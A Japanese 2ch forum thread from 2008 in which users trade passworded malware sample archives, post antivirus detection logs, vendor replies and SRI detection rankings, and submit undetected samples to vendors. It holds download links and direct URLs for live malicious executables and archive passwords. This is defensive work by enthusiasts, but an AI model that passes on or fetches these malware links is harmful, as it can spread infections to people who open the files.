Detected Trojan program Backdoor.Win32.Frauder.af tane0067.zip/Malware/a/Setup_trsupersolution-freeantivirus_com.exe

>>283
4/7
Detected Trojan program Trojan-PSW.Win32.VB.vb tane0068.zip/one-click/AdultManiac.exe
Detected Trojan program Trojan-PSW.Win32.VB.ta tane0068.zip/one-click/EroAnimePlayer.exe
Detected Trojan program Trojan-PSW.Win32.VB.vc tane0068.zip/one-click/MovieTubes.exe
Detected Trojan program Trojan-PSW.Win32.VB.vd tane0068.zip/one-click/SexyRoots.exe

検体提出します。

VT上では、カスペ7、>>283につき

HyperErectCollection.exe 　　　　Trojan-PSW.Win32.VB.wd
MoviesServiceProvider.exe　　　　Trojan-PSW.Win32.VB.we

追加検出。

K7AntiVirus 9.5.0528

>>282
6/12
Malware\1,XPGuardSetup.exe,Infected By not-a-virus:FraudTool.Win32.XPShield.d ,Cleaned ,
Malware\4,10.exe,Infected By Trojan-Downloader.Win32.Tiny.bvl ,Cleaned ,
Malware\5,8.exe,Infected By Trojan-Downloader.Win32.Agent.abxz ,Cleaned ,
Malware\6,player.exe,Infected By Trojan-Downloader.Win32.Exchanger.qb ,Cleaned ,
Malware\7,c-setup.exe,Infected by Trojan.Win32.BHO.gef,Cleaned ,
Malware\9,antivirus.v.1.0.exe,Infected By Trojan-Downloader.Win32.Banload.acs ,Cleaned ,

>>283
1/7
one-click,EroAnimePlayer.exe,Infected By Trojan-PSW.Win32.VB.ta ,Cleaned ,


名前はカスペといっしょ

>>282 8のみ白(11/12) >>283 真っ黒(7/7) で決まりかな

NOD32 3388 (20080826)

>>283　5/7
one-click\AdultChannel.exe - Win32/PSW.VB.QX トロイの木馬
one-click\EroAnimePlayer.exe - Win32/PSW.VB.NBL トロイの木馬
one-click\HyperErectCollection.exe - Win32/PSW.VB.NBO トロイの木馬
one-click\MovieTubes.exe - Win32/PSW.VB.NBR トロイの木馬
one-click\SexyRoots.exe - Win32/PSW.VB.NBQ トロイの木馬

>>282　8/12
Malware\1\XPGuardSetup.exe - Win32/Adware.XPGuard アプリケーション
Malware\2\MSASetup.exe > ZIP > MSA.cpl - Win32/Adware.Antivirus2008 アプリケーション
Malware\2\MSASetup.exe > ZIP > MSA.exe - Win32/Adware.Antivirus2008 アプリケーション
Malware\4\10.exe - Win32/TrojanDownloader.Tiny.NDP トロイの木馬
Malware\5\8.exe - Win32/TrojanDownloader.QQHelper.NHG トロイの木馬
Malware\6\player.exe - Win32/Agent.ETH トロイの木馬
Malware\7\c-setup.exe - Win32/Adware.IeDefender.NGUの亜種である可能性 アプリケーション
Malware\9\antivirus.v.1.0.exe - Win32/TrojanDownloader.Agent.ODV トロイの木馬
Malware\a\Setup_trsupersolution-freeantivirus_com.exe - Win32/TrojanDownloader.FakeAlert.HJ トロイの木馬

>>282乙
NIS2008で8/12 （0、1、2、4、5、6、7、9）
未検出は贈っておきました

>>283乙
NIS2008で7/1
未検出は贈っておきました

>>283乙
NIS2008で1/7
未検出は贈っておきました

カスペからの返事 ２つ。残り2つ返事待ち。

Hello,

AdultChannel.exe_ - Trojan-PSW.Win32.VB.wg
install.exe - （検体名記載なし。何らかのmalware）

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

Please quote all when answering.

--
Best regards, Namestnikov Yury


>>283は、PC上でも検知済み。
HyperErectCollection.exe 　　　　Trojan-PSW.Win32.VB.wd
MoviesServiceProvider.exe　　　　Trojan-PSW.Win32.VB.we

結局、
>>282 10/12（返事待ち２：setup.exe, noadware,.exe）
>>283 7/7

>>282
カスペ〜の返事　上記未報告分2件

Hello.

noadware.exe
No malicious software was found in the attached file.

setup.exe - not-a-virus:FraudTool.Win32.sentinel

New potentially risk software was found in these files.
Detection will be included in the next update.
Thank you for your help.

Please quote all when answering.

http://applis.servehttp.com/index.htm
ファイル名：00023568.rar　パスワード：abcd

>>294
>>3

>>294
http://www.virustotal.com/jp/analisis/1a674a0ade29cd3ad7e68f4204b3b36c

http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=69
DLKey：abcd

最近バスターはPAK_Generic.001といったGeneric検出がやたらと増えてきたな。
このスレ的には優秀な結果になるから良いんだけど誤検出が凄いことになりそう・・・
バスター以外でGeneric検出が得意なベンダーはAVGやavast!、BitDefender辺りか。

ダウソキーを貼り間違えた
DLKey：Virus

>>297
Packer捕獲してるだけだよ。最近増えてきたなこういうの。

正規のアプリはパッカー使う必然性が全く無いから、パッカー捕捉でも問題ない
アングラ系ツールを除けば、DQN作者のフリーウェアで使われる程度だろ

そうなんだよな、その時点で怪しいんだよな
怪しい物を捕らえる、という意味ではとりあえず捕獲して判断はユーザーに委ねる、という方法も悪くない

逆にPacker捕獲があまり強くないベンダーって？
Symantecはそういうのが弱そうに見えるけど・・・

ま、NOD27とZEROは論外、この二つのゴミはそれ以前に新種のスルーっぷりが異常。

>>296
カスペからの返事

Hello.
No malicious software was found in the attached file.

Please quote all when answering. Do not forget to include you registration data.
-----------------
Regards, Vyacheslav Zakorzhevsky

http://www.koha0kohaweb.com/play/GVG/lid576460752303920704.rar

>>302
弱いんじゃなく、やってないだけ。
官庁や大企業だと高価なアプリ(独自含む)を使ってることが多くて、
解析の妨害のためにPackerを使うことがよくある。
それを万が一誤検知されたら大騒ぎになるんでね。
自力でUnpackできない物に関しては触らない、というのは
Norton、McAfee、Dr.WEB、Kasperskyあたり。
そりゃ引っ掛ければ数字の上で成績は上がるんだけどさ。

あとNODも触らない。
AntiVirも前はそうだったんだけど、今は引っ掛けちゃう。
昔から引っかけまくるのはSophos、Panda、avastあたり。
Sophosに関しては「ウチはそういう方針だ」とメールもらったことがある
(逆に「スクリプトはウチはやらない」とも)。

PEiDで引っ掛ける程度のメジャーなPackerを判別できないベンダーは
いまどきないだろうけど(ソースネクストは知らんが)、
Unpackできるかどうかはまた別なわけで。
この辺は灰色を白とするか黒とするかのポリシーの違い。

>>305
そんな糞アプリを納入するゴミ会社は早めに淘汰しておかないと
この先マルウェア対策ができなくなるな

メモ帳を汎用的なUPXで圧縮しただけでも、VTで反応するベンダーもあるくらい。
機密保持のためのファイルの暗号化の開発も正当化されるから仕方がない。
落ち物拾わなければ、少しでも黒反応のものは実行しない方がいいと思うが
鑑定スレじゃないし

UpackだのnPackだのFSGだのはベンダの考えで好きにしていいと思うが
UPXは標準でUnpackできる上にソース公開されてるんだから
zipの中身調べられませんってレベルだよ。Unpackして検査してくれ。

>>305
なるほどね。
確かにGeneric検出をよくやるAntiVir、avast!、AVG、BitDefender、バスターに対しNorton、KasperskyはGeneric検出というのをあまり見ないというか見たことない。
その代わりKasperskyは鬼対応速度と鬼更新でカバーしてるという感じ、Nortonも最近はそんな感じだし2009はカスペ路線の鬼更新らしいね。

>>310
個人ユーザーにまったく売れなくなったから団体向けに路線変更したのかな？

GDATAは2009からKaspersky→BitDefenderになる模様。
といあえずBitDefenderの有料版を使ってみたかったから助かるし一日のアップデート回数はカスペからBitになっても変わらないとは思うけど検出性能はどうなんだろ・・・

個人的には去年一時期はかなり調子悪くスルーするトロイが多かったけど最近は復調気味という印象＞BitDefender
BitDefenderは各国のAmazon見る限りかなり売れてるからそのお金でMSに流出してしまった人材をまた確保できたのかな？

avastからBitに戻ったんじゃなくて、カスペからBitかよ

どうせならavast!、AVG、BitDefenderのトリプルエンジンやって欲しかったな。
この3つならカスペ捨てても検出率高そう。

avastは誤が多いからなぁ。AVG+Bitで十分な気が。
あとどこでもいいからシグネチャ重視のとVBA32と組み合わせて
どこかで出してくれないかな。
VBA32のパラノイドヒューリスティックはDr.WEBをトンガらせた感じで
(いい意味で)かなりイカレてる。

このスレ的な検出性能はAVG＞avast!、BitDefenderだな
去年辺りはAVGの大躍進とBitDefenderの一時的な凋落でAVG＞＞＞avast!、BitDefenderだったけど今年に入ってavast!の躍進とBitの復調で差が縮まった。
もちろんAVGは相変わらず良い感じだけど。

AVGは一度スルーされて感染した俺的にはクソ。

>>317　メッセンジャー経由のウイルスでしょ

一番スレでやれ

AntiVirがあれば他はいらない

バスターはいつの間にか土曜日もアップデート配信するようになったんだな。
これも米国にウイルス解析所設立した効果かな？

バスターのラボはフィリピンしか仕事してないよ。
りーじょなるｗトレンドラボだか東京に作ったけど
Winnyばっかやって仕事してねーし。

nyで感染ファイルあつめまくってくれてるんならいいが…ｗ

いやそうだろ。いいか悪いかは知らんけどな。

http://www.geocities.jp/kaneman010/winny/winny2.zip

http://livedoorbloog.com/keyword/d0808033566_5linmovesmm2.rar

>>326
ttp://www.virustotal.com/analisis/e6fb99bf046bae170ab6c706d8064008
Norton、McAfee、BitDefender以外はだいたい検知

http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=70
パス：virus

>>328
http://changi.2ch.net/download/

>>329
http://etc7.2ch.net/denpa/

>>328
解凍パスは？

スマン
ファイル間違ってて解凍パス抜けにつき上げ直しました

http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=71
パス：virus

ついでに砂箱内でちょっと遊んでみたログ
あきらかにあやしいんだけど検出できるソフトある？
Sep 1 21:50:58 a[1844,0]: fs Deny -----X File: C:\Program Files\Internet Explorer\IEXPLORE.EXE
Sep 1 21:51:02 a[1844,0]: fs Deny -----X File: D:\prg\rulesPlayer\ddeopener.exe %TEMP%\ss-enkoppv-2012.wmv
Sep 1 21:51:05 a[1844,0]: fs Allow -RWC-- File: %TEMP%\KB926239.exe
Sep 1 21:51:05 a[1844,0]: fs Deny -----X File: %TEMP%\KB926239.exe
Sep 1 21:51:07 a[1844,0]: fs Allow -RWC-- File: %TEMP%\KB951748.exe
Sep 1 21:51:07 a[1844,0]: fs Deny -----X File: %TEMP%\KB951748.exe

>>332
解凍したものをVirustotalスキャン
http://www.virustotal.com/jp/analisis/af2dbc2acb1eedeb6d86ae3b296b9136

nyとかで出回ってる奴だろ
ﾀﾞｳｿ板でやってくれ

援交ppvってｗ

http://www5.uploader.jp/dl/tane/tane_uljp00081.zip.html
解凍パス：infected
ＤＬパス：Virus

http://www.virustotal.com/jp/analisis/eb94bfa82383e0825df1c0bfd7b3f9eb

Microsoftに検体投げてる人、MMPCからアンケートメール来てね?

http://www.cyokinde.com/ffxishowvide/16498897649.rar

>>338
http://www.virustotal.com/analisis/4bb09e7c24d0adf67d2cc9a3e1465fe4

ie.exeとffxi.exeと2匹落とすのね。自己解凍ファイルをUpackしてある。

http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=72
pass:virus
http://www.virustotal.com/jp/analisis/0a5a05d56f7c3c8d6257396277449e80

>>341
カスペ対応済み
Trojan-Downloader.Win32.Zlob.xtt setup.exe
12:48捕獲、16:56シグネチャリリース

http://www.virustotal.com/analisis/caf00755618794c99a82c5b326c0bab7

Symantecも即日対応してるな。
SRIテストでも地味ながらも上昇してるしSymantecのウイルス対応速度向上は本物のようだな。

去年までのSymantecはここで検体提出してもいつになったら対応するのやら・・・という検体の方が多かったが。

http://pc11.2ch.net/test/read.cgi/sec/1140517079/932
あやしいファイルを実行するスレ


ttp://home.no/adobephotoshop/Project1.zip

http://www.virustotal.com/analisis/b407ffc2a4d63ad0cc6417b93edfe161

AntiVirとAVG以外の主要ベンダーは全滅か。
McAfeeが検出してるのが意外な気がするけど。

AntiVirのはPackerだと言ってるだけだから提出したほうがいいと思う

割れ厨が毒餌食っただけか。提出やめるわ

Virustotalに参戦したのはいいけど案の定スルーしまくりで大恥晒してるK7って何がしたいの？

>>344
うちのAntiVirは検出しない？？
Search Engine V8.01.01.28 2008/09/02
Virus Definition file V7.00.06.111 2008/09/03

AntiVirってまれにそういう現象あるよ。
ちなみにうちのはしっかりと検出する。

>>350
えぇっ〜
検出力高くてもそういう現象おきるなら
あんまり信用できないですね orz

ただPackerをスルーする設定だったとか？(そんな設定あるのか知らないけど)

>>349
Win32 file heuristicをHigh detection levelに設定しる
インスコ時は一箇所で設定できるけど、オプションだとScannerとGuardの二箇所だから注意な

運千葉スレの初心者ならともかく、このスレ住人なら最大検出設定にするだろ常考…
とか言いつつ、俺も運千葉使い始めた頃にハマったけどなｗ

ウイルスによる書き込み対策スレ
http://changi.2ch.net/test/read.cgi/download/1220292628/

ウイルスによる書き込み対策スレ
http://changi.2ch.net/test/read.cgi/download/1220292628/1

1 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：2008/09/02(火) 03:10:28 ID:AU+dFCo40
468 名前：Akihisa 投稿日：2008/09/02(火) 02:31:44 ID:oYC0jkiT0
ほらほら、どっからでもかかってくるおｗｗｗｗｗｗｗ

348 名前：Akihisa 投稿日：2008/09/02(火) 02:49:47 ID:oYC0jkiT0
ここでオナニーしていいですか


349 名前：Akihisa 投稿日：2008/09/02(火) 02:52:44 ID:oYC0jkiT0
ここはお前の日記帳じゃないだろ・・・常識的に考えて

>>353
ありが�d
Highにしたらちゃんと検出できました m(＿)m

>>344

�d

カスペ、スルーにつき、一応検体提出。
（>>3が気になるが…）

>>344
一応AntiVirとAVGに送った

http://game13-2ch.2288.org/gourmet/080803.rar

http://google.netcdn.com/cao/cao.exe

>>359
http://www.virustotal.com/analisis/371192a69a3cf5761b41401227d5a97f
>>360
http://www.virustotal.com/analisis/b958e6b1142d7395d02cade969749fd6

>>344
AntiVirからFALSE POSITIVEとの回答がきた
AVGはまだきてない

今日捕まえたマルウェア32種類（主にバックドア）のVirustotal.com結果

AntiVir　　 検出数11 （未検出21）
AVG 　　　 検出数10 （未検出22）
Kaspersky 検出数6 （未検出26）
Norton 　　検出数6 （未検出26）

>>363
Packer捕獲をするベンダーとしないベンダの差なのかな？
avast!、BitDefender、バスターはどうだろ？
あとマカフィーとNODも。

>>360
なんか初めてVTですべてのベンダーが検出ウイルスを見た気がしますｗ

>>344

カスペから返事ようやくきた。

Hello,

Project1.exe_

No malicious code was found in this file.

Please quote all when answering.

--
Best regards, Evgeny Aseev
Virus analyst, Kaspersky Lab

>>362のAntiVirとあわせると、白か。

検知力テスト(2008年9月07日)
Most Effective Antivirus Tools Against New Malware Binaries
ttp://mtc.sri.com/live_data/av_rankings/
Rank Detects Missed Product
1st 97% 90 AntiVir
2nd 96% 101 Webwasher-Gateway
3rd 94% 167 Ikarus
4th 93% 205 BitDefender
5th 92% 253 AVG
6th 91% 266 F-Secure
7th 89% 346 Avast
8th 89% 359 Sophos
9th 88% 365 Norman
10th 85% 478 ClamAV
11th 85% 481 Kaspersky
12th 84% 502 Microsoft
13th 84% 504 CAT-QuickHeal
14th 83% 538 VirusBuster
15th 82% 559 DrWeb
16th 80% 640 Rising
17th 80% 647 Fortinet
18th 80% 648 F-Prot
19th 79% 665 Symantec
20th 79% 677 eTrust-Vet
21st 76% 765 TheHacker
22nd 73% 869 McAfee
23rd 73% 871 VBA32
24th 73% 875 AhnLab-V3
25th 72% 915 Panda
26th 71% 929 Authentium
27th 69% 997 NOD27w
28th 47% 1712 TrendMicro

ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=74
Malware-Pack40

>>368 AVG提出しました！乙です

>>368
Rising Antivirus 20.61.02
7\despacho_artigo8755151.scr: Suspicious.Trojan.Win32.VBDownLoader.a

>>368
�d

カスペ2009 17:47:00

9/12（0,1,4,5,6,7,8,9,a)

Detected Trojan program Trojan-Downloader.JS.Timul.dd 0/ggbbyahoo.html
Detected Trojan program Trojan-Downloader.Win32.Delf.gff 5/dwbins.exe
Detected Trojan program Trojan-Downloader.Win32.FraudLoad.vbpu 6/setup.ver1_1000.0_.exe
Detected Trojan program Trojan-Downloader.Win32.VB.hkw 7/despacho_artigo8755151.scr
Detected Trojan program Backdoor.Win32.SdBot.gxk 8/madonna.exe
Detected Trojan program Trojan-Downloader.Win32.Dadobra.bfu 9/abrir-4377473-47374343-3.exe
Detected riskware not-a-virus:FraudTool.Win32.Devushka.b 1/ss_install.exe
Detected riskware not-a-virus:FraudTool.Win32.Agent.bs 4/ASE_Setup_Free.exe
Detected riskware not-a-virus:FraudTool.Win32.SpyDevastator.b a/spydevastator_v1_32_install.exe//data0008
Detected riskware not-a-virus:FraudTool.Win32.SpyDevastator.a a/spydevastator_v1_32_install.exe//data0013

検体提出します。(2,3,b)

>>368乙
NIS2008で5/12 （4、6、7、8、9）
未検出は贈っておきました

>>368
K7AntiVirus 9.5.0540
1/12
\Malware\4,ASE_Setup_Free.exe,Infected by Trojan.Win32.Malware.1,Cleaned ,

>>368
NOD32

3/12

Malware\4\ASE_Setup_Free.exe - Win32/Adware.AntiSpywareExpert アプリケーション
Malware\6\setup.ver1_1000.0_.exe - Win32/Adware.Antivirus2008 アプリケーション
Malware\9\abrir-4377473-47374343-3.exe - 新種・未知のNewHeur_PEである可能性 ウイルス

検知力テスト(2008年9月08日)
Most Effective Antivirus Tools Against New Malware Binaries
ttp://mtc.sri.com/live_data/av_rankings/
Rank Detects Missed Product
1st 97% 90 AntiVir
2nd 96% 101 Webwasher-Gateway
3rd 94% 167 Ikarus
4th 93% 205 BitDefender
5th 92% 253 AVG
6th 91% 265 F-Secure
7th 89% 346 Avast
8th 89% 359 Sophos
9th 88% 364 Norman
10th 85% 478 ClamAV
11th 85% 481 Kaspersky
12th 84% 502 Microsoft
13th 84% 503 CAT-QuickHeal
14th 83% 538 VirusBuster
15th 82% 559 DrWeb
16th 80% 639 Rising
17th 80% 646 Fortinet
18th 80% 648 F-Prot
19th 79% 665 Symantec
20th 79% 677 eTrust-Vet
21st 76% 763 TheHacker
22nd 73% 869 McAfee
23rd 73% 869 VBA32
24th 73% 875 AhnLab-V3
25th 71% 915 Panda
26th 71% 928 Authentium
27th 69% 997 NOD27w
28th 47% 1704 TrendMicro

カスペが贔屓だが、こりゃすっかりマークされてるんだろうかな
やっぱどうにかして併用かねー。

ウイルスバスター2008
1/12
5 TROJ_DLOADER.VTA
提出しときます

UDしたら6番も検出しました。
TROJ_FAKEAV.LD

>>376
多分10/12が正解だからカスペは健闘してる
まさかSRIの捏造テストの話じゃないよな

570 名前： 名無しさん＠お腹いっぱい。 [sage] 投稿日： 2008/09/09(火) 15:48:02
今来たメールに添付されてたやつ
やっぱり検出しないね
http://www.virustotal.com/analisis/72707cde2703b00189aeed3f7ccb89c2
http://www.virustotal.com/analisis/60570a5400a8c0b377ed75041a267d7c

>>380
成績の悪いアンチウイルス業者のアラシだな
http://pc11.2ch.net/test/read.cgi/sec/1220338514/570-571

ttp://netra.lpru.ac.th/~phsakong/Virus/

>>381
アラシっておまえ基地外だろ

>>371
カスペからの返事

Free-SpyWareScan.exe,fooware.exe は無害
もう一つ返事待ちだけれど、無害っぽい。

検知力テスト(2008年9月10日)
Most Effective Antivirus Tools Against New Malware Binaries
ttp://mtc.sri.com/live_data/av_rankings/
Rank Detects Missed Product
1st 97% 90 AntiVir
2nd 96% 101 Webwasher-Gateway
3rd 94% 167 Ikarus
4th 93% 205 BitDefender
5th 92% 252 AVG
6th 91% 261 F-Secure
7th 89% 344 Avast
8th 89% 357 Sophos
9th 88% 361 Norman
10th 85% 477 ClamAV
11th 85% 481 Kaspersky
12th 84% 501 Microsoft
13th 84% 501 CAT-QuickHeal
14th 83% 536 VirusBuster
15th 82% 557 DrWeb
16th 80% 635 Rising
17th 80% 644 Fortinet
18th 80% 647 F-Prot
19th 79% 662 Symantec
20th 79% 674 eTrust-Vet
21st 76% 761 TheHacker
22nd 73% 866 VBA32
23rd 73% 868 McAfee
24th 73% 873 AhnLab-V3
25th 71% 913 Panda
26th 71% 926 Authentium
27th 69% 994 NOD27w
28th 47% 1692 TrendMicro

ttp://www.gamesrb.com/rbv/uu.exe

>>386
>>3
Requested URL:  http://www.gamesrb.com/rbv/uu.exe
Information: Is the TR/Crypt.XPACK.Gen Trojan

>>382
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=75
抜き出しておいたよ。
AVGで反応したのは除外してあるのと暇な人AVGに送ってくれ。
なんか疲れた

ttp://　71.6.194.　213:8080/RO/MKJ6.scr
ttp://　71.6.194.　213:8080/file/mpg.scr


MKJ6.scr
http://www.virustotal.com/analisis/989843b41efccb1a2c2f996c61d0214f
mpg.scr
http://www.virustotal.com/analisis/9426cc5ede9d3e702a751c1aff9693ed
シマンテックには送付済み

>>388
�d
(でも。14.4MBって、orz 割れ？)
DLパスワード＝解凍パスワード＝"virus"


カスペ2009


3/29

Detected riskware not-a-virus:FraudTool.Win32.SpyNoMore.ai tane0075.zip/Download_wintasksprotrial2.exe
Detected Trojan program Trojan.Win32.StartPage.cto tane0075.zip/killVBS.vbs_killer.exe//UPX
Detected Trojan program Trojan.Win32.StartPage.ayh tane0075.zip/Anti_Hacked_By_Godzilla.exe//UPX


一応、検体提出します。

>>388
カスペからの返事・途中経過

Hello,

AntiNimd.exe_, ANTIVDO.exe_, BrontokKiller.exe_, cs_expl.exe_, data_exe_killer.exe_, FixWelch.exe_, HijackThis.exe_, Killer.exe_, killer.exe_1, KillGodzilla4.exe_, MSN_Worm_Remover.exe_, procexp.exe_,Toy_killer.exe_

No malicious code were found in these files.（悪意のあるコードなし）

KlAntiFL.exe_

This file is in process.(このファイルは解析中）

Please quote all when answering.

--
Best regards, Vyacheslav Zakorzhevsky
Virus analyst, Kaspersky Lab.

結果 3/29（提出26中、13白、13回答待ち）

検知力テスト(2008年9月13日)
Most Effective Antivirus Tools Against New Malware Binaries
ttp://mtc.sri.com/live_data/av_rankings/
Rank Detects Missed Product
1st 97% 93 AntiVir
2nd 96% 102 Webwasher-Gateway
3rd 94% 170 Ikarus
4th 93% 210 BitDefender
5th 92% 255 AVG
6th 91% 272 F-Secure
7th 89% 341 Sophos
8th 89% 352 Avast
9th 88% 364 Norman
10th 85% 473 ClamAV
11th 85% 484 Kaspersky
12th 84% 501 CAT-QuickHeal
13th 84% 504 Microsoft
14th 83% 538 VirusBuster
15th 82% 559 DrWeb
16th 80% 630 Fortinet
17th 79% 647 F-Prot
18th 79% 647 Rising
19th 79% 658 Symantec
20th 79% 662 eTrust-Vet
21st 76% 762 TheHacker
22nd 74% 840 McAfee
23rd 72% 873 VBA32
24th 72% 873 AhnLab-V3
25th 72% 897 Authentium
26th 72% 901 Panda
27th 69% 970 NOD27w
28th 49% 1630 TrendMicro

カスペ2009
>>388追加検出

Detected Trojan program Trojan-Downloader.Win32.Agent.aggo Monaliza_killer.exe//UPX
Detected Trojan program Trojan-Downloader.Win32.Agent.aggq RUNDLL64.dll.vbs_killer.exe//UPX

送りすぎて渋滞中。

結果 5/29（提出26中、2黒、13白、11回答待ち）

>>388 カスペからの返事まとめ

AdobeR_Killer.exe_, SXS_Killer.exe_, CLRAV.COM_, COMDLG32.OCX_, CPE17AntiAutorun119.exe_, Fix_SVCHOST100_.exe_, Fix_SVCHOST100_25.exe, KillGodzilla.exe_,spyeraserplb.exe_

No malicious code were found in these files.

結果 5/29（提出26中、2黒、22白、2回答待ち）

>>368
これNIS２００９でなにも反応しないけど何で？

>>395
ちゃんと解凍した？

>>395
素人さんが手を出すととんでもない事になりかねんぞ

ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=77
Malware-Pack41

>>398
Avira AntiVir
TR/BHO.gsz [trojan]　Malware\1\AdobeFlashPlayerUpdate.exe
BDS/Small.cij.12 [backdoor]　Malware\2\montagens.fotos.scr
DR/FakeAlert.PH [dropper]　Malware\3\TotalSecure2009.exe
TR/Dldr.FraudLoad.vcae [trojan]　Malware\4\setup.ver1_1000.0_.exe
HTML/Rce.Gen [virus]　Malware\6\pdf.pdf
TR/Drop.Agent.wrk [trojan]　Malware\8\e-card.exe
TR/Dldr.Banload.vnr [trojan]　Malware\7\fotos.exe
TR/Multis.GX [trojan]　Malware\a\antivirus.v.1.exe
TR/Drop.BYFH.99878 [trojan]　Malware\b\SoftwareSetup.exe
0,5,9提出しときます

>>398
バスター2009
5/12　（2,4,6,8,a）
残り提出しときます。

それにしても検出できたの偶数ばっかｗ

>>398乙
NIS2009で 7/12 （1、3、4、5、6、8、a）
未検出は贈っておきました

>>398
0 http://www.virustotal.com/analisis/621f8936ec9b01ab90ade661f270a376
1 http://www.virustotal.com/analisis/8ea62572acd7e417dd5a88a8b8e44060
2 http://www.virustotal.com/analisis/2df775361181f733c1664ef483e7b88f
3 http://www.virustotal.com/analisis/58d6b13b260a71e6598a9c1d193eb7b2
4 http://www.virustotal.com/analisis/5c1423be285a42cd7c368fdee25e1fd2
5 http://www.virustotal.com/analisis/095e87e0aae1029eb9c4c5700f26f9b0
6 http://www.virustotal.com/analisis/f6a057005cfc99fdf2e0e04e277cdfa4
7 http://www.virustotal.com/analisis/32aea558475799e948fc473464f5557e
8 http://www.virustotal.com/analisis/f8d0adf0e8cc5fc6f64880abf833104a
9 http://www.virustotal.com/analisis/22013ac75e661adc1ac9106e24a04ad5
a http://www.virustotal.com/analisis/470eb87ef6d2db5e5e73a72ebfa72fa6
b http://www.virustotal.com/analisis/44cb9d44c632a698185294fe1087b3ef

>>402
アレ？ 7も検出してるね
Auto Protect検出だけでなくて
残ったファイルをフォルダごと手動スキャンすればよかったのかな？

1-4-6-7-8-9-a撃墜　6/11

2008/09/18 2:47: ファイル C:\Documents and Settings\\Malware\1\AdobeFlashPlayerUpdate.exe に不正なコードを検知しました。 
感染: Trojan.Win32.BHO.gsz 
処理: ファイルを削除しました。 
2008/09/18 2:47: ファイル C:\Documents and Settings\\Malware\4\setup.ver1_1000.0_.exe に不正なコードを検知しました。 
感染: Trojan-Downloader.Win32.FraudLoad.vcae 
処理: ファイルを削除しました。 
2008/09/18 2:47: ファイル C:\Documents and Settings\\Malware\6\pdf.pdf に不正なコードを検知しました。 
感染: Exploit.Win32.Pidief.gp 
処理: ファイルを削除しました。 
2008/09/18 2:47: ファイル C:\Documents and Settings\\Malware\7\fotos.exe に不正なコードを検知しました。 
感染: Trojan-Downloader.Win32.Banload.vnr 
処理: ファイルを削除しました。 
2008/09/18 2:47: ファイル C:\Documents and Settings\\Malware\8\e-card.exe に不正なコードを検知しました。 
感染: Trojan-Dropper:W32/Agent.FDY 
処理: ファイルを削除しました。 
2008/09/18 2:47: ファイル C:\Documents and Settings\\Malware\9\ver_postal.com に不正なコードを検知しました。 
感染: Worm:W32/Agent.BUC 
処理: ファイルを削除しました。 
2008/09/18 2:47: ファイル C:\Documents and Settings\\Malware\a\antivirus.v.1.exe に不正なコードを検知しました。 
感染: Trojan.Win32.Multis.gx 
処理: ファイルを削除しました。 

>>403
NIS2009とVTで使われてるので検索エンジンが違うからじゃない？

>>404訂正
1-4-6-7-8-9-a撃墜　7/11

>>405
どうもそうらしい
再手動スキャンでも7は未検出でした

http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=78
解凍パス：infected
ＤＬパス：virus

>>408
He_138811
http://www.virustotal.com/jp/analisis/10ada89c1891cc25d270c36652e495f4

0001.exe
http://www.virustotal.com/jp/analisis/6dceb21cc09883aad237aa7110ca38dc

keikei_uljp00122.exe
http://www.virustotal.com/jp/analisis/84ff69772e1216738aec7daf6805f2fe

>406 ：F-Secure2009 ：2008/09/17(水) 18:21:37 
時点で検体送るもまだ対応されず

Rising Antivirus 2009 21.01.21 (20.63.05.00)
>>398
2\montagens.fotos.scr: Suspicious.Trojan.Win32.VBDownLoader.a
>>408
スルー

>>398
�d
カスペ2009@ 20:02:00
7/12

Detected Trojan program Trojan.Win32.BHO.gsz tane0077.zip/Malware/1/AdobeFlashPlayerUpdate.exe
Detected Trojan program Trojan-Downloader.Win32.FraudLoad.vcae tane0077.zip/Malware/4/setup.ver1_1000.0_.exe
Detected Trojan program Exploit.Win32.Pidief.gp tane0077.zip/Malware/6/pdf.pdf
Detected Trojan program Trojan-Downloader.Win32.Banload.vnr tane0077.zip/Malware/7/fotos.exe
Detected Trojan program Trojan-Dropper.Win32.Agent.wrk tane0077.zip/Malware/8/e-card.exe
Detected Trojan program Trojan.Win32.Qhost.klm tane0077.zip/Malware/9/ver_postal.com
Detected Trojan program Trojan.Win32.Multis.gx tane0077.zip/Malware/a/antivirus.v.1.exe

1,4,6,7,8,9,a。F-Secureと同じ。
検体提出します。

>>408
0/3
これも後に検体提出します。

>>398
ヒューリスティックで8/12だった。orz。これも一応提出。

Detected Trojan program Heur.Downloader Malware/2/montagens.fotos.scr

今回のはやばいかもわからん
特にゼロ番はサンドボックス超えていったぞw

>>414
そんなのあるんだ

>>414
0番て、Verisignのデジタル署名付きじゃないかw

>398
カスペからの返事
一つのファイルだけorz

>>413のヒューリスティック・エンジンからシグネチャに変更(2\montagens.fotos.scr)
8/12(回答待ち４)

Hello.
New malicious software was found in the attached file.
It's detection will be included in the next update. Thank you for your help.

Trojan-Downloader.Win32.VB.hto

Sincerely yours,
Andrey Bezborodov,


おまけ
>>394の回答待ち2つはClean

>>398の2と3対応

C:\Documents and Settings\\Malware\2\montagens.fotos.scr 
Trojan-Downloader.Win32.VB.hto (ウィルス)
C:\Documents and Settings\\Malware\3\TotalSecure2009.exe
Rogue:W32/TotalSecure.B (リスクウェア)

これって解凍してからスキャンしないと検出されないんですか？

パスワード付きは解凍しなきゃだめだろ常識で考えて

>>420
>>397

解凍する時に発動するウィルスだったらどうする？

脆弱性が報告されている変な解凍ソフト使ってなければ大丈夫じゃね。

キーボードの上にものを落としたり、誤ってダブルクリックするのは問題外。でも、1スレに一人はいる。実行した！助けて！って。ｗ

参加したいんｽけど具体的にはどうしたらいいんｽかね？
先輩たち教えてくださいﾖｗｗ

と言う輩が増えてきた
一体何が目的なのかと

まあ、セキュリティ勉強するのも良いんじゃない？
【総合】サンドボックス　砂箱　sandbox
ttp://pc11.2ch.net/test/read.cgi/sec/1202282636/

F-Secure Security Labs さんは書きました:
>Hello,
>
>Files that will be detected:
>TotalSecure2009.exe - Rogue:W32/TotalSecure.B
>Scan.exe - Rogue:W32/TotalSecure.B
>antispyware_setup.exe - Rogue:W32/RealAntiSpyware.A
